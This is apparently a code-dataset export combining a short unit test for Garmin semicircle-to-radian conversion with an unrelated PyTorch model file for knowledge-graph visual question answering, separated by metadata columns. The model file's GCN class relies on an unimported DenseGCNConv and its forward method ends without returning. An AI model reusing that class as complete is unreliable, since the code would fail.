slither/test/test_unit_conversions.py
|
AlexanderFabisch/slither
|
c527e0412cf89197f907a42699a554f26cb2af59
|
[
"BSD-2-Clause-FreeBSD"
] | null | null | null |
from slither.core import unit_conversions
from nose.tools import assert_equal
def test_semicircles_to_radians():
assert_equal(unit_conversions.semicircles_to_radians(0), 0)
assert_equal(unit_conversions.semicircles_to_radians(1), 1.4629180792671596e-09)
assert_equal(unit_conversions.semicircles_to_radians(1000), 1.4629180792671597e-06)
assert_equal(unit_conversions.semicircles_to_radians(1000000000), 1.4629180792671597)
assert_equal(unit_conversions.semicircles_to_radians(-1000000000), -1.4629180792671597)
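# Sketch (not part of the original file) of the conversion under test: Garmin
# "semicircles" map the signed 32-bit integer range onto [-pi, pi), so the
# scale factor is pi / 2**31, which reproduces the expected values above.

import math

def semicircles_to_radians_sketch(semicircles):
    return semicircles * (math.pi / 2 ** 31)

assert_equal(semicircles_to_radians_sketch(1), 1.4629180792671596e-09)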
| 48.545455
| 91
| 0.840824
| 68
| 534
| 6.235294
| 0.352941
| 0.212264
| 0.283019
| 0.306604
| 0.669811
| 0.669811
| 0.669811
| 0.34434
| 0.34434
| 0.34434
| 0
| 0.20122
| 0.078652
| 534
| 10
| 92
| 53.4
| 0.660569
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.75
| 1
| 0.125
| true
| 0
| 0.25
| 0
| 0.375
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
56c2264b642eb8338f786b3242938dec111eb77f
| 33,725
|
py
|
Python
|
model.py
|
YuJungHeo/kbvqa-public
|
c04bed5c60085ac3a551a8c196e6269befce1e5b
|
[
"MIT"
] | null | null | null |
model.py
|
YuJungHeo/kbvqa-public
|
c04bed5c60085ac3a551a8c196e6269befce1e5b
|
[
"MIT"
] | null | null | null |
model.py
|
YuJungHeo/kbvqa-public
|
c04bed5c60085ac3a551a8c196e6269befce1e5b
|
[
"MIT"
] | null | null | null |
import utils
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
from modules.transformer import TransformerEncoder
class ClassEmbedding(nn.Module):
def __init__(self, cfg, trainable=True):
super(ClassEmbedding, self).__init__()
idx2vocab = utils.load_files(cfg["DATASET"]["IDX2VOCAB"])
self.n_token = len(idx2vocab)
self.word_emb_size = cfg["MODEL"]["NUM_WORD_EMB"]
self.emb = nn.Embedding(self.n_token, self.word_emb_size)
weight_init = utils.load_files(cfg["DATASET"]["GLOVE"]).astype(np.float32)
weight_mat = torch.from_numpy(weight_init)
self.emb.load_state_dict({"weight": weight_mat})
if not trainable:
self.emb.weight.requires_grad = False
def forward(self, x):
emb = self.emb(x)
return emb
class AnswerSelector(nn.Module):
def __init__(self, cfg):
super(AnswerSelector, self).__init__()
self.av2i = utils.load_files(cfg["DATASET"]["AVOCAB2IDX"])
self.len_avocab = len(self.av2i)
self.glove_cands = utils.load_files(cfg["DATASET"]["GLOVE_ANS_CAND"]).astype(
np.float32
)
self.glove_cands = torch.from_numpy(self.glove_cands).cuda()
def forward(self, inputs):
similarity = torch.matmul(inputs, self.glove_cands.transpose(0, 1))
pred = F.log_softmax(similarity, dim=1)
return pred
class HypergraphTransformer(nn.Module):
def __init__(self, cfg, args):
super(HypergraphTransformer, self).__init__()
self.cfg = cfg
self.args = args
self.n_hop = args.n_hop
self.word_emb_size = cfg["MODEL"]["NUM_WORD_EMB"]
self.max_num_hqnode = cfg["MODEL"]["NUM_MAX_QNODE"]
self.n_hidden = cfg["MODEL"]["NUM_HIDDEN"]
self.max_num_hknode = cfg["MODEL"]["NUM_MAX_KNODE_{}H".format(self.n_hop)]
self.n_out = cfg["MODEL"]["NUM_OUT"]
self.n_ans = cfg["MODEL"]["NUM_ANS"]
self.abl_only_ga = args.abl_only_ga
self.abl_only_sa = args.abl_only_sa
if "pql" in args.data_name:
self.i2e = ClassEmbedding(cfg, False) # pql : small dataset
else:
self.i2e = ClassEmbedding(cfg)
self.q2h = torch.nn.Linear(
self.word_emb_size * self.max_num_hqnode, self.n_hidden
)
self.k2h = torch.nn.Linear(
self.word_emb_size * self.max_num_hknode, self.n_hidden
)
if self.abl_only_sa != True:
self.trans_k_with_q = self.get_network(self_type="kq")
self.trans_q_with_k = self.get_network(self_type="qk")
if self.abl_only_ga != True:
self.trans_k_mem = self.get_network(self_type="k_mem", layers=3)
self.trans_q_mem = self.get_network(self_type="q_mem", layers=3)
self.dropout = nn.Dropout(p=self.cfg["MODEL"]["INP_DROPOUT"])
self.out_dropout = 0.0
if self.args.abl_ans_fc != True:
self.proj1 = nn.Linear(2 * self.n_hidden, self.n_hidden)
self.proj2 = nn.Linear(self.n_hidden, self.n_out)
self.ans_selector = AnswerSelector(cfg)
else:
self.proj1 = nn.Linear(2 * self.n_hidden, self.n_hidden)
self.proj2 = nn.Linear(self.n_hidden, self.n_ans)
def get_network(self, self_type="", layers=-1):
if self_type in ["kq", "k_mem"]:
embed_dim, attn_dropout = self.n_hidden, self.cfg["MODEL"]["ATTN_DROPOUT_K"]
elif self_type in ["qk", "q_mem"]:
embed_dim, attn_dropout = self.n_hidden, self.cfg["MODEL"]["ATTN_DROPOUT_Q"]
else:
raise ValueError("Unknown network type")
return TransformerEncoder(
embed_dim=embed_dim,
num_heads=self.cfg["MODEL"]["NUM_HEAD"],
layers=max(self.cfg["MODEL"]["NUM_LAYER"], layers),
attn_dropout=attn_dropout,
relu_dropout=self.cfg["MODEL"]["RELU_DROPOUT"],
res_dropout=self.cfg["MODEL"]["RES_DROPOUT"],
embed_dropout=self.cfg["MODEL"]["EMB_DROPOUT"],
attn_mask=self.cfg["MODEL"]["ATTN_MASK"],
fc_hid_coeff=self.cfg["MODEL"]["FC_HID_COEFF"],
)
def forward(self, batch):
he_ques = batch[0]
he_kg = batch[1]
num_batch = he_ques.shape[0]
num_he_ques = he_ques.shape[1]
num_he_kg = he_kg.shape[1]
he_ques = torch.reshape(self.i2e(he_ques), (num_batch, num_he_ques, -1))
he_kg = torch.reshape(self.i2e(he_kg), (num_batch, num_he_kg, -1))
he_ques = self.q2h(he_ques)
he_kg = self.k2h(he_kg)
he_ques = self.dropout(he_ques)
he_kg = self.dropout(he_kg)
he_ques = he_ques.permute(1, 0, 2)
he_kg = he_kg.permute(1, 0, 2)
if self.args.abl_only_ga == True:
h_k_with_q = self.trans_k_with_q(he_kg, he_ques, he_ques)
h_ks_sum = torch.sum(h_k_with_q, axis=0)
h_q_with_k = self.trans_q_with_k(he_ques, he_kg, he_kg)
h_qs_sum = torch.sum(h_q_with_k, axis=0)
last_kq = torch.cat([h_ks_sum, h_qs_sum], dim=1)
elif self.args.abl_only_sa == True:
h_ks = self.trans_k_mem(he_kg)
h_ks_sum = torch.sum(h_ks, axis=0)
h_qs = self.trans_q_mem(he_ques)
h_qs_sum = torch.sum(h_qs, axis=0)
last_kq = torch.cat([h_ks_sum, h_qs_sum], dim=1)
else: # self.args.abl_only_ga == False and self.args.abl_only_sa == False:
h_k_with_q = self.trans_k_with_q(he_kg, he_ques, he_ques)
h_ks = self.trans_k_mem(h_k_with_q)
h_ks_sum = torch.sum(h_ks, axis=0)
h_q_with_k = self.trans_q_with_k(he_ques, he_kg, he_kg)
h_qs = self.trans_q_mem(h_q_with_k)
h_qs_sum = torch.sum(h_qs, axis=0)
last_kq = torch.cat([h_ks_sum, h_qs_sum], dim=1)
if self.args.abl_ans_fc != True:
output = self.proj2(
F.dropout(
F.relu(self.proj1(last_kq)),
p=self.out_dropout,
training=self.training,
)
)
pred = self.ans_selector(output)
else:
output = self.proj2(
F.dropout(
F.relu(self.proj1(last_kq)),
p=self.out_dropout,
training=self.training,
)
)
pred = F.log_softmax(output, dim=1)
return pred
class HypergraphTransformer_wohe(nn.Module):
def __init__(self, cfg, args):
super(HypergraphTransformer_wohe, self).__init__()
self.cfg = cfg
self.args = args
self.n_hop = args.n_hop
self.word_emb_size = cfg["MODEL"]["NUM_WORD_EMB"]
self.n_hidden = cfg["MODEL"]["NUM_HIDDEN"]
self.n_out = cfg["MODEL"]["NUM_OUT"]
self.n_ans = cfg["MODEL"]["NUM_ANS"]
self.max_num_hqnode = 1
self.max_num_hknode = 1
self.i2e = ClassEmbedding(cfg)
self.q2h = torch.nn.Linear(
self.word_emb_size * self.max_num_hqnode, self.n_hidden
)
self.k2h = torch.nn.Linear(
self.word_emb_size * self.max_num_hknode, self.n_hidden
)
self.trans_k_with_q = self.get_network(self_type="kq")
self.trans_q_with_k = self.get_network(self_type="qk")
self.trans_k_mem = self.get_network(self_type="k_mem", layers=3)
self.trans_q_mem = self.get_network(self_type="q_mem", layers=3)
self.proj1 = nn.Linear(2 * self.n_hidden, self.n_hidden)
self.proj2 = nn.Linear(self.n_hidden, self.n_out)
self.dropout = nn.Dropout(p=self.cfg["MODEL"]["INP_DROPOUT"])
self.out_dropout = 0.0
if self.args.abl_ans_fc != True:
self.proj1 = nn.Linear(2 * self.n_hidden, self.n_hidden)
self.proj2 = nn.Linear(self.n_hidden, self.n_out)
self.ans_selector = AnswerSelector(cfg)
else:
self.proj1 = nn.Linear(2 * self.n_hidden, self.n_hidden)
self.proj2 = nn.Linear(self.n_hidden, self.n_ans)
def get_network(self, self_type="", layers=-1):
if self_type in ["kq", "k_mem"]:
embed_dim, attn_dropout = self.n_hidden, self.cfg["MODEL"]["ATTN_DROPOUT_K"]
elif self_type in ["qk", "q_mem"]:
embed_dim, attn_dropout = self.n_hidden, self.cfg["MODEL"]["ATTN_DROPOUT_Q"]
else:
raise ValueError("Unknown network type")
return TransformerEncoder(
embed_dim=embed_dim,
num_heads=self.cfg["MODEL"]["NUM_HEAD"],
layers=max(self.cfg["MODEL"]["NUM_LAYER"], layers),
attn_dropout=attn_dropout,
relu_dropout=self.cfg["MODEL"]["RELU_DROPOUT"],
res_dropout=self.cfg["MODEL"]["RES_DROPOUT"],
embed_dropout=self.cfg["MODEL"]["EMB_DROPOUT"],
attn_mask=self.cfg["MODEL"]["ATTN_MASK"],
)
def forward(self, batch):
he_ques = batch[0]
he_kg = batch[1]
num_batch = he_ques.shape[0]
num_he_ques = he_ques.shape[1]
num_he_kg = he_kg.shape[1]
he_ques = torch.reshape(self.i2e(he_ques), (num_batch, num_he_ques, -1))
he_kg = torch.reshape(self.i2e(he_kg), (num_batch, num_he_kg, -1))
he_ques = self.q2h(he_ques)
he_kg = self.k2h(he_kg)
he_ques = self.dropout(he_ques)
he_kg = self.dropout(he_kg)
he_ques = he_ques.permute(1, 0, 2)
he_kg = he_kg.permute(1, 0, 2)
h_k_with_q = self.trans_k_with_q(he_kg, he_ques, he_ques)
h_ks = self.trans_k_mem(h_k_with_q)
h_ks_sum = torch.sum(h_ks, axis=0)
h_q_with_k = self.trans_q_with_k(he_ques, he_kg, he_kg)
h_qs = self.trans_q_mem(h_q_with_k)
h_qs_sum = torch.sum(h_qs, axis=0)
last_kq = torch.cat([h_ks_sum, h_qs_sum], dim=1)
if self.args.abl_ans_fc != True:
output = self.proj2(
F.dropout(
F.relu(self.proj1(last_kq)),
p=self.out_dropout,
training=self.training,
)
)
pred = self.ans_selector(output)
else:
output = self.proj2(
F.dropout(
F.relu(self.proj1(last_kq)),
p=self.out_dropout,
training=self.training,
)
)
pred = F.log_softmax(output, dim=1)
return pred
class HypergraphTransformer_qsetkhe(nn.Module):
def __init__(self, cfg, args):
super(HypergraphTransformer_qsetkhe, self).__init__()
self.cfg = cfg
self.args = args
self.n_hop = args.n_hop
self.word_emb_size = cfg["MODEL"]["NUM_WORD_EMB"]
self.n_hidden = cfg["MODEL"]["NUM_HIDDEN"]
self.n_out = cfg["MODEL"]["NUM_OUT"]
self.max_num_hqnode = 1
self.max_num_hknode = cfg["MODEL"]["NUM_MAX_KNODE_{}H".format(self.n_hop)]
self.i2e = ClassEmbedding(cfg)
self.q2h = torch.nn.Linear(
self.word_emb_size * self.max_num_hqnode, self.n_hidden
)
self.k2h = torch.nn.Linear(
self.word_emb_size * self.max_num_hknode, self.n_hidden
)
self.trans_k_with_q = self.get_network(self_type="kq")
self.trans_q_with_k = self.get_network(self_type="qk")
self.trans_k_mem = self.get_network(self_type="k_mem", layers=3)
self.trans_q_mem = self.get_network(self_type="q_mem", layers=3)
self.proj1 = nn.Linear(2 * self.n_hidden, self.n_hidden)
self.proj2 = nn.Linear(self.n_hidden, self.n_out)
self.dropout = nn.Dropout(p=self.cfg["MODEL"]["INP_DROPOUT"])
self.out_dropout = 0.0
self.ans_selector = AnswerSelector(cfg)
def get_network(self, self_type="", layers=-1):
if self_type in ["kq", "k_mem"]:
embed_dim, attn_dropout = self.n_hidden, self.cfg["MODEL"]["ATTN_DROPOUT_K"]
elif self_type in ["qk", "q_mem"]:
embed_dim, attn_dropout = self.n_hidden, self.cfg["MODEL"]["ATTN_DROPOUT_Q"]
else:
raise ValueError("Unknown network type")
return TransformerEncoder(
embed_dim=embed_dim,
num_heads=self.cfg["MODEL"]["NUM_HEAD"],
layers=max(self.cfg["MODEL"]["NUM_LAYER"], layers),
attn_dropout=attn_dropout,
relu_dropout=self.cfg["MODEL"]["RELU_DROPOUT"],
res_dropout=self.cfg["MODEL"]["RES_DROPOUT"],
embed_dropout=self.cfg["MODEL"]["EMB_DROPOUT"],
attn_mask=self.cfg["MODEL"]["ATTN_MASK"],
)
def forward(self, batch):
he_ques = batch[0]
he_kg = batch[1]
num_batch = he_ques.shape[0]
num_he_ques = he_ques.shape[1]
num_he_kg = he_kg.shape[1]
he_ques = torch.reshape(self.i2e(he_ques), (num_batch, num_he_ques, -1))
he_kg = torch.reshape(self.i2e(he_kg), (num_batch, num_he_kg, -1))
he_ques = self.q2h(he_ques)
he_kg = self.k2h(he_kg)
he_ques = self.dropout(he_ques)
he_kg = self.dropout(he_kg)
he_ques = he_ques.permute(1, 0, 2)
he_kg = he_kg.permute(1, 0, 2)
h_k_with_q = self.trans_k_with_q(he_kg, he_ques, he_ques)
h_ks = self.trans_k_mem(h_k_with_q)
h_ks_sum = torch.sum(h_ks, axis=0)
h_q_with_k = self.trans_q_with_k(he_ques, he_kg, he_kg)
h_qs = self.trans_q_mem(h_q_with_k)
h_qs_sum = torch.sum(h_qs, axis=0)
last_kq = torch.cat([h_ks_sum, h_qs_sum], dim=1)
output = self.proj2(
F.dropout(
F.relu(self.proj1(last_kq)), p=self.out_dropout, training=self.training
)
)
pred = self.ans_selector(output)
return pred
class HypergraphTransformer_qhekset(nn.Module):
def __init__(self, cfg, args):
super(HypergraphTransformer_qhekset, self).__init__()
self.cfg = cfg
self.args = args
self.n_hop = args.n_hop
self.word_emb_size = cfg["MODEL"]["NUM_WORD_EMB"]
self.n_hidden = cfg["MODEL"]["NUM_HIDDEN"]
self.n_out = cfg["MODEL"]["NUM_OUT"]
self.max_num_hknode = 1
self.max_num_hqnode = cfg["MODEL"]["NUM_MAX_QNODE"]
self.i2e = ClassEmbedding(cfg)
self.q2h = torch.nn.Linear(
self.word_emb_size * self.max_num_hqnode, self.n_hidden
)
self.k2h = torch.nn.Linear(
self.word_emb_size * self.max_num_hknode, self.n_hidden
)
self.trans_k_with_q = self.get_network(self_type="kq")
self.trans_q_with_k = self.get_network(self_type="qk")
self.trans_k_mem = self.get_network(self_type="k_mem", layers=3)
self.trans_q_mem = self.get_network(self_type="q_mem", layers=3)
self.proj1 = nn.Linear(2 * self.n_hidden, self.n_hidden)
self.proj2 = nn.Linear(self.n_hidden, self.n_out)
self.dropout = nn.Dropout(p=self.cfg["MODEL"]["INP_DROPOUT"])
self.out_dropout = 0.0
self.ans_selector = AnswerSelector(cfg)
def get_network(self, self_type="", layers=-1):
if self_type in ["kq", "k_mem"]:
embed_dim, attn_dropout = self.n_hidden, self.cfg["MODEL"]["ATTN_DROPOUT_K"]
elif self_type in ["qk", "q_mem"]:
embed_dim, attn_dropout = self.n_hidden, self.cfg["MODEL"]["ATTN_DROPOUT_Q"]
else:
raise ValueError("Unknown network type")
return TransformerEncoder(
embed_dim=embed_dim,
num_heads=self.cfg["MODEL"]["NUM_HEAD"],
layers=max(self.cfg["MODEL"]["NUM_LAYER"], layers),
attn_dropout=attn_dropout,
relu_dropout=self.cfg["MODEL"]["RELU_DROPOUT"],
res_dropout=self.cfg["MODEL"]["RES_DROPOUT"],
embed_dropout=self.cfg["MODEL"]["EMB_DROPOUT"],
attn_mask=self.cfg["MODEL"]["ATTN_MASK"],
)
def forward(self, batch):
he_ques = batch[0]
he_kg = batch[1]
num_batch = he_ques.shape[0]
num_he_ques = he_ques.shape[1]
num_he_kg = he_kg.shape[1]
he_ques = torch.reshape(self.i2e(he_ques), (num_batch, num_he_ques, -1))
he_kg = torch.reshape(self.i2e(he_kg), (num_batch, num_he_kg, -1))
he_ques = self.q2h(he_ques)
he_kg = self.k2h(he_kg)
he_ques = self.dropout(he_ques)
he_kg = self.dropout(he_kg)
he_ques = he_ques.permute(1, 0, 2)
he_kg = he_kg.permute(1, 0, 2)
h_k_with_q = self.trans_k_with_q(he_kg, he_ques, he_ques)
h_ks = self.trans_k_mem(h_k_with_q)
h_ks_sum = torch.sum(h_ks, axis=0)
h_q_with_k = self.trans_q_with_k(he_ques, he_kg, he_kg)
h_qs = self.trans_q_mem(h_q_with_k)
h_qs_sum = torch.sum(h_qs, axis=0)
last_kq = torch.cat([h_ks_sum, h_qs_sum], dim=1)
output = self.proj2(
F.dropout(
F.relu(self.proj1(last_kq)), p=self.out_dropout, training=self.training
)
)
pred = self.ans_selector(output)
return pred
class HAN(nn.Module):
def __init__(self, cfg, args):
super(HAN, self).__init__()
self.cfg = cfg
self.n_hidden = cfg["MODEL"]["NUM_HIDDEN"]
self.n_head = cfg["MODEL"]["NUM_HEAD"]
self.word_emb_size = cfg["MODEL"]["NUM_WORD_EMB"]
self.n_hop = args.n_hop
self.n_out = cfg["MODEL"]["NUM_OUT"]
self.max_num_hk = cfg["MODEL"]["NUM_MAX_HK_{}H".format(self.n_hop)]
self.max_num_hknode = cfg["MODEL"]["NUM_MAX_KNODE_{}H".format(self.n_hop)]
self.max_num_hqnode = cfg["MODEL"]["NUM_MAX_QNODE"]
self.i2e = ClassEmbedding(cfg)
self.q2h = torch.nn.Linear(
self.word_emb_size * self.max_num_hqnode, self.n_hidden
)
self.k2h = torch.nn.Linear(
self.word_emb_size * self.max_num_hknode, self.n_hidden
)
self.h2att = torch.nn.Linear(self.n_hidden, self.n_head)
self.softmax_att = torch.nn.Softmax(dim=2)
self.fc_out = torch.nn.Linear(self.n_hidden * self.n_head, self.n_out)
self.dropout = nn.Dropout(p=self.cfg["MODEL"]["INP_DROPOUT"])
self.ans_selector = AnswerSelector(cfg)
def multihead_att(self, he_ques, he_src):
num_batch = he_ques.shape[0]
num_he_ques = he_ques.shape[1]
num_he_src = he_src.shape[1]
he_ques = torch.reshape(self.i2e(he_ques), (num_batch, num_he_ques, -1))
he_src = torch.reshape(self.i2e(he_src), (num_batch, num_he_src, -1))
he_ques = self.q2h(he_ques)
he_src = self.k2h(he_src)
he_ques = self.dropout(he_ques)
he_src = self.dropout(he_src)
he_ques = he_ques.permute(0, 2, 1)
he_src = he_src.permute(0, 2, 1)
he_ques_selfatt = he_ques.unsqueeze(3)
he_src_selfatt = he_src.unsqueeze(2)
self_mul = torch.matmul(he_ques_selfatt, he_src_selfatt)
self_mul = self_mul.permute(0, 2, 3, 1)
att_map = self.h2att(self_mul)
att_map = att_map.permute(0, 3, 1, 2)
att_map = torch.reshape(att_map, (-1, self.n_head, num_he_ques * num_he_src))
att_map = self.softmax_att(att_map)
att_map = torch.reshape(att_map, (-1, self.n_head, num_he_ques, num_he_src))
he_ques = he_ques.unsqueeze(2)
he_src = he_src.unsqueeze(3)
for i in range(self.n_head):
att_g = att_map[:, i : i + 1, :, :]
att_g_t = att_g.repeat([1, self.n_hidden, 1, 1])
att_out = torch.matmul(he_ques, att_g_t)
att_out = torch.matmul(att_out, he_src)
att_out = att_out.squeeze(-1)
att_out_sq = att_out.squeeze(-1)
if i == 0:
output = att_out_sq
else:
output = torch.cat((output, att_out_sq), dim=1)
output = self.fc_out(output)
pred = self.ans_selector(output)
return pred, att_map
def forward(self, batch):
he_ques = batch[0]
he_kg = batch[1]
pred, att_map = self.multihead_att(he_ques, he_kg)
return pred
class BAN(nn.Module):
def __init__(self, cfg, args):
super(BAN, self).__init__()
self.cfg = cfg
self.n_hidden = cfg["MODEL"]["NUM_HIDDEN"]
self.n_head = cfg["MODEL"]["NUM_HEAD"]
self.word_emb_size = cfg["MODEL"]["NUM_WORD_EMB"]
self.n_hop = args.n_hop
self.n_out = cfg["MODEL"]["NUM_OUT"]
self.max_num_hk = cfg["MODEL"]["NUM_MAX_HK_{}H".format(self.n_hop)]
self.max_num_hknode = 1
self.max_num_hqnode = 1
self.i2e = ClassEmbedding(cfg)
self.q2h = torch.nn.Linear(
self.word_emb_size * self.max_num_hqnode, self.n_hidden
)
self.k2h = torch.nn.Linear(
self.word_emb_size * self.max_num_hknode, self.n_hidden
)
self.h2att = torch.nn.Linear(self.n_hidden, self.n_head)
self.softmax_att = torch.nn.Softmax(dim=2)
self.fc_out = torch.nn.Linear(self.n_hidden * self.n_head, self.n_out)
self.dropout = nn.Dropout(p=self.cfg["MODEL"]["INP_DROPOUT"])
self.ans_selector = AnswerSelector(cfg)
def multihead_att(self, he_ques, he_src, q2h, s2h):
num_batch = he_ques.shape[0]
num_he_ques = he_ques.shape[1]
num_he_src = he_src.shape[1]
he_ques = torch.reshape(self.i2e(he_ques), (num_batch, num_he_ques, -1))
he_src = torch.reshape(self.i2e(he_src), (num_batch, num_he_src, -1))
he_ques = q2h(he_ques)
he_src = s2h(he_src)
he_ques = self.dropout(he_ques)
he_src = self.dropout(he_src)
he_ques = he_ques.permute(0, 2, 1)
he_src = he_src.permute(0, 2, 1)
he_ques_selfatt = he_ques.unsqueeze(3)
he_src_selfatt = he_src.unsqueeze(2)
self_mul = torch.matmul(he_ques_selfatt, he_src_selfatt)
self_mul = self_mul.permute(0, 2, 3, 1)
att_map = self.h2att(self_mul)
att_map = att_map.permute(0, 3, 1, 2)
att_map = torch.reshape(att_map, (-1, self.n_head, num_he_ques * num_he_src))
att_map = self.softmax_att(att_map)
att_map = torch.reshape(att_map, (-1, self.n_head, num_he_ques, num_he_src))
he_ques = he_ques.unsqueeze(2)
he_src = he_src.unsqueeze(3)
for i in range(self.n_head):
att_g = att_map[:, i : i + 1, :, :]
att_g_t = att_g.repeat([1, self.n_hidden, 1, 1])
att_out = torch.matmul(he_ques, att_g_t)
att_out = torch.matmul(att_out, he_src)
att_out = att_out.squeeze(-1)
att_out_sq = att_out.squeeze(-1)
if i == 0:
output = att_out_sq
else:
output = torch.cat((output, att_out_sq), dim=1)
output = self.fc_out(output)
pred = self.ans_selector(output)
return pred, att_map
def forward(self, batch):
he_ques = batch[0]
he_kg = batch[1]
pred, att_map = self.multihead_att(he_ques, he_kg, self.q2h, self.k2h)
return pred
class GGNN(nn.Module):
"""
Reimplementation of Gated Graph Sequence Neural Networks (GGNN) by Kaihua Tang
Implementation based on https://arxiv.org/abs/1511.05493
"""
def __init__(self, cfg, args, n_node):
super(GGNN, self).__init__()
self.n_input = cfg["MODEL"]["NUM_WORD_EMB"]
self.annotation_dim = cfg["MODEL"]["NUM_ANNO"]
self.hidden_dim = cfg["MODEL"]["NUM_HIDDEN"]
self.n_edge = cfg["MODEL"]["NUM_EDGE"]
self.n_out = cfg["MODEL"]["NUM_OUT"]
self.n_steps = cfg["MODEL"]["NUM_STEP"]
self.max_num_kg = n_node
self.max_num_q = cfg["MODEL"]["NUM_MAX_Q"]
self.i2e = ClassEmbedding(cfg)
self.fc_qenc = nn.Linear(self.n_input + self.annotation_dim, self.hidden_dim)
self.fc_kenc = nn.Linear(self.n_input + self.annotation_dim, self.hidden_dim)
self.fc_in = nn.Linear(self.hidden_dim, self.hidden_dim * self.n_edge)
self.fc_out = nn.Linear(self.hidden_dim, self.hidden_dim * self.n_edge)
self.gated_update_kg = GatedPropagation(
self.hidden_dim, self.max_num_kg, self.n_edge
)
self.graph_aggregate_kg = GraphFeature(
self.hidden_dim, self.max_num_kg, self.n_edge, self.annotation_dim
)
self.gated_update_ques = GatedPropagation(
self.hidden_dim, self.max_num_q, self.n_edge
)
self.graph_aggregate_ques = GraphFeature(
self.hidden_dim, self.max_num_q, self.n_edge, self.annotation_dim
)
self.fc_output = nn.Linear(self.hidden_dim * 2, self.n_out)
self.ans_selector = AnswerSelector(cfg)
def forward(self, batch):
"""
batch: adj_matrix, annotation, entity_rep, answer
init state x: [batch_size, num_node, hidden_size]
        annotation a: [batch_size, num_node, 1]
adj matrix m: [batch_size, num_node, num_node * n_edge_types * 2]
output out: [batch_size, n_label]
"""
ques = batch[0]
adjmat_ques = batch[1]
ques_anno = batch[2]
kg = batch[3]
adjmat_kg = batch[4]
kg_anno = batch[5]
kg = self.i2e(kg)
ques = self.i2e(ques)
kg = torch.cat((kg, kg_anno), 2)
ques = torch.cat((ques, ques_anno), 2)
kg = self.fc_kenc(kg)
ques = self.fc_qenc(ques)
for i in range(self.n_steps):
in_states = self.fc_in(kg)
out_states = self.fc_out(kg)
in_states = (
in_states.view(-1, self.max_num_kg, self.hidden_dim, self.n_edge)
.transpose(2, 3)
.transpose(1, 2)
.contiguous()
)
in_states = in_states.view(
-1, self.max_num_kg * self.n_edge, self.hidden_dim
)
out_states = (
out_states.view(-1, self.max_num_kg, self.hidden_dim, self.n_edge)
.transpose(2, 3)
.transpose(1, 2)
.contiguous()
)
out_states = out_states.view(
-1, self.max_num_kg * self.n_edge, self.hidden_dim
)
kg = self.gated_update_kg(in_states, out_states, kg, adjmat_kg)
for i in range(self.n_steps):
in_states = self.fc_in(ques)
out_states = self.fc_out(ques)
in_states = (
in_states.view(-1, self.max_num_q, self.hidden_dim, self.n_edge)
.transpose(2, 3)
.transpose(1, 2)
.contiguous()
)
in_states = in_states.view(
-1, self.max_num_q * self.n_edge, self.hidden_dim
)
out_states = (
out_states.view(-1, self.max_num_q, self.hidden_dim, self.n_edge)
.transpose(2, 3)
.transpose(1, 2)
.contiguous()
)
out_states = out_states.view(
-1, self.max_num_q * self.n_edge, self.hidden_dim
)
ques = self.gated_update_ques(in_states, out_states, ques, adjmat_ques)
kg_out = self.graph_aggregate_kg(torch.cat((kg, kg_anno), 2))
ques_out = self.graph_aggregate_ques(torch.cat((ques, ques_anno), 2))
output = torch.cat((kg_out, ques_out), axis=1)
output = self.fc_output(output)
pred = self.ans_selector(output)
return pred
class GraphFeature(nn.Module):
def __init__(self, hidden_dim, n_node, n_edge, n_anno):
super(GraphFeature, self).__init__()
self.hidden_dim = hidden_dim
self.n_node = n_node
self.n_edge = n_edge
self.n_anno = n_anno
self.fc_i = nn.Linear(self.hidden_dim + self.n_anno, self.hidden_dim)
self.fc_j = nn.Linear(self.hidden_dim + self.n_anno, self.hidden_dim)
self.sigmoid = nn.Sigmoid()
self.tanh = nn.Tanh()
def forward(self, x):
x_sigm = self.sigmoid(self.fc_i(x))
x_tanh = self.tanh(self.fc_j(x))
x_new = (x_sigm * x_tanh).sum(1)
return self.tanh(x_new)
class GatedPropagation(nn.Module):
def __init__(self, hidden_dim, n_node, n_edge):
super(GatedPropagation, self).__init__()
self.hidden_dim = hidden_dim
self.n_node = n_node
self.n_edge = n_edge
self.gate_r = nn.Linear(self.hidden_dim * 3, self.hidden_dim)
self.gate_z = nn.Linear(self.hidden_dim * 3, self.hidden_dim)
self.trans = nn.Linear(self.hidden_dim * 3, self.hidden_dim)
self.sigmoid = nn.Sigmoid()
self.tanh = nn.Tanh()
def forward(self, x_in, x_out, x_curt, matrix):
matrix_in = matrix[:, :, : self.n_node * self.n_edge]
matrix_out = matrix[:, :, self.n_node * self.n_edge :]
a_in = torch.bmm(matrix_in.float(), x_in)
a_out = torch.bmm(matrix_out.float(), x_out)
a = torch.cat((a_in, a_out, x_curt), 2)
z = self.sigmoid(self.gate_z(a))
r = self.sigmoid(self.gate_r(a))
joint_input = torch.cat((a_in, a_out, r * x_curt), 2)
h_hat = self.tanh(self.trans(joint_input))
output = (1 - z) * x_curt + z * h_hat
return output
class GCN(torch.nn.Module):
def __init__(self, cfg, arg):
super(GCN, self).__init__()
self.n_input = cfg["MODEL"]["NUM_WORD_EMB"]
self.hidden_dim = cfg["MODEL"]["NUM_HIDDEN"]
self.n_out = cfg["MODEL"]["NUM_OUT"]
self.i2e = ClassEmbedding(cfg)
self.q_gcn1 = DenseGCNConv(self.n_input, self.hidden_dim)
self.q_gcn2 = DenseGCNConv(self.hidden_dim, self.hidden_dim)
self.kg_gcn1 = DenseGCNConv(self.n_input, self.hidden_dim)
self.kg_gcn2 = DenseGCNConv(self.hidden_dim, self.hidden_dim)
self.fc_output = nn.Linear(self.hidden_dim * 2, self.n_out)
self.ans_selector = AnswerSelector(cfg)
def forward(self, batch):
ques_idxs = batch[0]
ques_adj = batch[1]
kg_idxs = batch[2]
kg_adj = batch[3]
ques_emb = self.i2e(ques_idxs)
kg_emb = self.i2e(kg_idxs)
ques_emb = self.q_gcn1(ques_emb, ques_adj)
ques_emb = self.q_gcn2(ques_emb, ques_adj)
ques_emb = torch.sum(ques_emb, axis=1)
        # the knowledge-graph branch uses its own GCN layers
        kg_emb = self.kg_gcn1(kg_emb, kg_adj)
        kg_emb = self.kg_gcn2(kg_emb, kg_adj)
kg_emb = torch.sum(kg_emb, axis=1)
last_kg = torch.cat([kg_emb, ques_emb], dim=1)
